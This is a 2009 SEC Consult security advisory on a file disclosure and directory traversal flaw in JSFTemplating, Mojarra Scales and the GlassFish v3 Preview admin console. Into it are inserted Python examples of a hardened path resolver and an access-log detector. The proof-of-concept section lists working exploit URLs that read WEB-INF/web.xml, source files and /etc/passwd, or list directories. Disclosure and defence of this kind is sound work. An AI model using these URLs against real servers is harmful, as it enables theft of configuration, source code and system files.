					               JSFTemplating, Mojarra Scales, GlassFish File Disclosure Vulnerabilities        Page 1/4
SEC Consult Security Advisory < 20090901-0 >
=======================================================================
              title: File disclosure vulnerability in JSFTemplating,
                     Mojarra Scales and GlassFish Application Server v3 Admin
                     console
           products: JSFTemplating (FileStreamer/PhaseListener component)
                     Mojarra Scales
                     GlassFish Application Server v3 Preview (Admin console)
 vulnerable version: JSFTemplating: all versions < v1.2.11
                     Mojarra Scales: all versions < v1.3.2
                     GlassFish: v3 Preview
      fixed version: JSFTemplating: v1.2.11
                     Mojarra Scales: v1.3.2
                     GlassFish: v2 is not affected according to vendor
             impact: critical
           homepage: https://jsftemplating.dev.java.net
                     http://kenai.com/projects/scales
                     https://glassfish.dev.java.net
              found: 2009-07-01
                 by: J. Greil / SEC Consult / www.sec-consult.com
=======================================================================

Vendor description:
-------------------
Templating for JavaServer™ Faces Technology plugs into JavaServer™ Faces to
make building pages and components easy.

Creating pages or components is done using a template file. JSFTemplating's
design allows for multiple syntaxes, currently it supports 2 of its own plus
most of the Facelets syntax. All syntaxes support all of JSFTemplating's
features such as PageSession, Events & Handlers, dynamic reloading of page
content, etc.

source: https://jsftemplating.dev.java.net/#what
also see:
http://kenai.com/projects/scales/
https://glassfish.dev.java.net/


Vulnerability overview/description:
-----------------------------------
The JSFTemplating FileStreamer functionality (when used through the
PhaseListener), which serves static or dynamic content such as the Yahoo UI
files shipped with Mojarra Scales, is vulnerable to
* file disclosure, and it also allows an attacker
* to retrieve directory listings of the whole server

Furthermore, Mojarra Scales and the GlassFish Application Server (v3 Preview)
Admin console use the vulnerable component as well.

JSFTemplating/FileStreamer can be exploited to read sensitive application data
on the whole server, depending on the configuration. One tested server allowed
us to access all files on the server (with the rights of the webserver user);
another server was restricted to files within the webroot (but including
WEB-INF). Which of the two applies probably depends on the Java security
policy (SecurityManager) in effect or on filesystem permissions.

An attacker is able to obtain sensitive data such as configuration files
(WEB-INF/web.xml), the whole source code of the application or other sensitive
data on the server.

Furthermore, it is possible to retrieve directory listings of directories on
the whole server and of the webroot by specifying a directory instead of a file.

SEC Consult                                                        09/01/2009

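The overview above describes what goes wrong when a request parameter is joined straight onto the web root: an empty value lists the root, a directory name lists that directory, and "../" walks out of the webroot whenever the filesystem and security policy allow it. As an added example (not code from this advisory, from JSFTemplating or from Mojarra Scales), the following Python models that unsafe resolution beside a hardened version of the same handler and runs both against the parameter values used in the advisory. The throwaway web root, the allow-listed resource directory `yui/`, and every function name here are assumptions made for this example.

```python
"""Added example, not code from the SEC Consult advisory or from JSFTemplating:
a toy "serve the file named by a request parameter" handler in its unsafe form
and in a hardened form, exercised with the parameter values from the advisory.
The web root layout, the allow-listed directory and all names are assumptions."""
import os
import tempfile
from pathlib import Path


def build_sample_webroot() -> Path:
    """Create a throwaway web root mimicking the layout from the advisory.
    The files and their contents are constructed for this example only."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    (root / "WEB-INF").mkdir()
    (root / "WEB-INF" / "web.xml").write_text("<web-app><!-- secret config --></web-app>\n")
    (root / "index.jsp").write_text("<html>index source</html>\n")
    (root / "yui").mkdir()
    (root / "yui" / "yahoo.js").write_text("/* static resource */\n")
    return root


def vulnerable_resolve(webroot: Path, filename: str) -> bytes:
    """Unsafe: the parameter is joined onto the web root with no validation.
    "" resolves to the root itself, "../" walks out of it, an absolute path
    replaces the root entirely, and a directory is listed instead of refused.
    This models the defect class from the overview, not FileStreamer's code."""
    target = webroot / filename
    if target.is_dir():
        return "\n".join(sorted(os.listdir(target))).encode()
    return target.read_bytes()


class ForbiddenPath(Exception):
    """Raised by hardened_resolve for any request it refuses to serve."""


def hardened_resolve(webroot: Path, filename: str,
                     allowed_prefixes=("yui/",)) -> bytes:
    """Hardened: canonicalise, confine to the web root, deny the
    container-private trees, deny directories, and serve only from an
    allow-list of resource directories."""
    if not filename:
        raise ForbiddenPath("empty filename")
    if "\x00" in filename or filename.startswith(("/", "\\")):
        raise ForbiddenPath("absolute path or NUL byte")
    root = webroot.resolve()
    # resolve() collapses "..", "." and symlinks before any check is made
    target = (root / filename).resolve()
    try:
        rel = target.relative_to(root)
    except ValueError:
        raise ForbiddenPath("escapes web root") from None
    if rel.parts and rel.parts[0].upper() in ("WEB-INF", "META-INF"):
        raise ForbiddenPath("container-private directory")
    if not any(rel.as_posix().startswith(p) for p in allowed_prefixes):
        raise ForbiddenPath("not in an allow-listed resource directory")
    if not target.is_file():
        raise ForbiddenPath("not a regular file")
    return target.read_bytes()


# Parameter values taken from the advisory, plus one that traverses through an
# allowed directory to show why canonicalisation must come before the checks.
PROBES = (
    "WEB-INF/web.xml",
    "index.jsp",
    "",
    "../../../../../../etc/passwd",
    "yui/../WEB-INF/web.xml",
    "yui/yahoo.js",
)


def compare(webroot: Path) -> dict:
    """Run every probe through the hardened resolver and record the outcome."""
    outcome = {}
    for probe in PROBES:
        try:
            hardened_resolve(webroot, probe)
            outcome[probe] = "served"
        except ForbiddenPath as exc:
            outcome[probe] = "blocked: " + str(exc)
    return outcome


if __name__ == "__main__":
    root = build_sample_webroot()
    print("vulnerable, filename=WEB-INF/web.xml:", vulnerable_resolve(root, "WEB-INF/web.xml"))
    print("vulnerable, filename= (empty):", vulnerable_resolve(root, ""))
    for probe, result in compare(root).items():
        print(f"hardened, filename={probe!r}: {result}")
```

The order of the checks is the point: the "yui/../WEB-INF/web.xml" probe passes a naive prefix test on the raw string, so the path is canonicalised first and every check runs on the canonical result. Refusing directories outright removes the listing behaviour, and the allow-list means a mistake in the other checks still only exposes the directory that was meant to be public.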
Proof of concept:
-----------------
The URLs to exploit this vulnerability may differ from server to server. The
vulnerable HTTP parameters are usually named "filename" or "file".

By requesting the following URLs an attacker gains access to sensitive
configuration files, source code or other possibly sensitive files:

========================
/jsft_resource.jsf?contentSourceId=resourceCS&filename=WEB-INF/web.xml
/jsft_resource.jsf?contentSourceId=resourceCS&filename=index.jsp
/jsft_resource.jsf?contentSourceId=resourceCS&filename=at/mycompany/
/jsft_resource.jsf?contentSourceId=resourceCS&filename=at/mycompany/some.class
========================


By using an empty value for the file/filename parameter, a directory listing of
the webroot is shown. Directory traversal is also possible, but whether data
outside the webroot can be accessed depends on the installation/configuration.

========================
/scales_static_resource.jsf?file=
/scales_static_resource.jsf?file=../../../../../../etc/
/scales_static_resource.jsf?file=../../../../../../etc/passwd
========================


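The probe URLs above are also exactly what exploitation looks like in a web-server access log, which makes them a straightforward detection target. The following Python is an added example (not part of the advisory) that scans constructed NCSA combined-format log lines for requests to a JSF-mapped URL whose file/filename parameter is empty, traverses with "..", names WEB-INF or META-INF, ends in a directory separator, or asks for source or bytecode; it undoes repeated percent-encoding first so that %2e%2e and %252e%252e are caught as well, and it marks a 200 response with a body as a probable success. The log lines, hosts, timestamps and sizes are constructed for the example.

```python
"""Added example, not part of the SEC Consult advisory: detection logic for the
probe URLs above, run over constructed NCSA combined-format access-log lines.
The hosts, paths, timestamps and sizes in the sample are invented."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log; line 1 is a legitimate Scales resource request,
# lines 2-6 mirror the advisory's probes, line 7 is unrelated traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Sep/2009:10:00:01 +0200] "GET /app/scales_static_resource.jsf?file=yui/yahoo-min.js HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Sep/2009:10:00:07 +0200] "GET /app/jsft_resource.jsf?contentSourceId=resourceCS&filename=WEB-INF/web.xml HTTP/1.1" 200 1873 "-" "curl/7.19"
10.0.0.9 - - [01/Sep/2009:10:00:09 +0200] "GET /app/scales_static_resource.jsf?file= HTTP/1.1" 200 922 "-" "curl/7.19"
10.0.0.9 - - [01/Sep/2009:10:00:12 +0200] "GET /app/scales_static_resource.jsf?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1302 "-" "curl/7.19"
10.0.0.9 - - [01/Sep/2009:10:00:15 +0200] "GET /app/scales_static_resource.jsf?file=%252e%252e/%252e%252e/etc/ HTTP/1.1" 404 310 "-" "curl/7.19"
10.0.0.5 - - [01/Sep/2009:10:00:20 +0200] "GET /app/jsft_resource.jsf?contentSourceId=resourceCS&filename=at/mycompany/some.class HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Sep/2009:10:00:25 +0200] "GET /app/index.jsf HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
FILE_PARAMS = ("file", "filename")          # parameter names given in the advisory
PRIVATE_DIRS = ("WEB-INF", "META-INF")
SOURCE_SUFFIXES = (".jsp", ".class", ".java", ".properties")


def fully_decode(value: str, rounds: int = 3) -> str:
    """Strip repeated percent-encoding so %252e%252e ends up as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(file_value: str):
    """Why a file/filename value looks like an attack, or None if it is benign."""
    v = fully_decode(file_value).replace("\\", "/")
    if v == "":
        return "empty value (web root directory listing)"
    if v.startswith("/"):
        return "absolute path"
    parts = v.split("/")
    if ".." in parts:
        return "directory traversal"
    if any(p.upper() in PRIVATE_DIRS for p in parts):
        return "container-private directory"
    if v.endswith("/"):
        return "directory listing"
    if v.lower().endswith(SOURCE_SUFFIXES):
        return "source or bytecode disclosure"
    return None


def scan(log_text: str) -> list:
    """Return one finding per suspicious file parameter in a JSF request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # the handler mapping varies per deployment; any JSF-mapped URL counts
        if not (url.path.endswith(".jsf") or "/faces/" in url.path):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # one unquote round here
        for name in FILE_PARAMS:
            for value in params.get(name, []):
                reason = classify(value)
                if reason is None:
                    continue
                findings.append({
                    "ip": m["ip"], "ts": m["ts"], "path": url.path,
                    "param": name, "value": value, "reason": reason,
                    "status": int(m["status"]),
                    # a 200 with a non-empty body means the server probably served it
                    "likely_success": m["status"] == "200" and m["size"] not in ("0", "-"),
                })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "HIT " if f["likely_success"] else "miss"
        print(f'{flag} {f["ip"]} {f["ts"]} {f["path"]}?{f["param"]}={f["value"]!r}: {f["reason"]}')
```

Matching on the parameter value rather than on the two endpoint names is deliberate, because the advisory notes that the URLs differ between deployments; a query for `jsft_resource.jsf` alone would miss a custom mapping. The double-decoding is what separates this from a plain string match, since a single `unquote` (which `parse_qs` already applies) leaves `%2e%2e` untouched.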
Vulnerable versions:
--------------------
JSFTemplating:
* all versions < v1.2.11

Mojarra Scales:
* all versions < v1.3.2

GlassFish:
* v3 Preview (Admin console)

According to the vendor, GlassFish v2 does not use vulnerable components.

Vendor contact timeline:
------------------------
2009-07-07: Contacted the developers of JSFTemplating by email.
2009-07-07: Very fast response from the developers by email and IRC; initial
            attempts to fix the issue were made
2009-07-08: Agreed that they would take a further look at the issue by the
            end of July
2009-07-30: Contacted the developers again, they need more time
2009-08-10/13: Asked the developers for any news
2009-08-14: Answer that the fix will make it into the next release
2009-08-31: Fixes for JSFTemplating and Mojarra Scales available
2009-09-01: Coordinated release date

Special thanks to Jason and Ken!

Solution:
---------
* Upgrade to the latest version of JSFTemplating, v1.2.11 has the fix:
http://download.java.net/maven/1/com.sun.jsftemplating/jars/

CVS commit logs with some information regarding the new security features can
be found here:
https://jsftemplating.dev.java.net/servlets/BrowseList?listName=cvs&by=date&from=2009-08-01&to=2009-08-31&first=1&count=16


* Upgrade to the latest version of Mojarra Scales, v1.3.2 has the fix:
http://kenai.com/projects/scales/downloads/directory/Mojarra%20Scales%201.3.2/


* GlassFish: Use the current stable version v2 or see the workaround section for v3.

Workaround:
-----------
GlassFish v3 Preview: Use strong passwords for the GlassFish Admin console and
restrict network access to the Admin console port (4848).

Advisory URL:
-------------
https://www.sec-consult.com/advisories_e.html#a61

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

SEC Consult conducts periodical information security workshops on ISO
27001/BS 7799 in cooperation with BSI Management Systems. For more
information, please refer to https://www.sec-consult.com/academy_e.html

EOF J. Greil / @2009

# milw0rm.com [2009-09-01]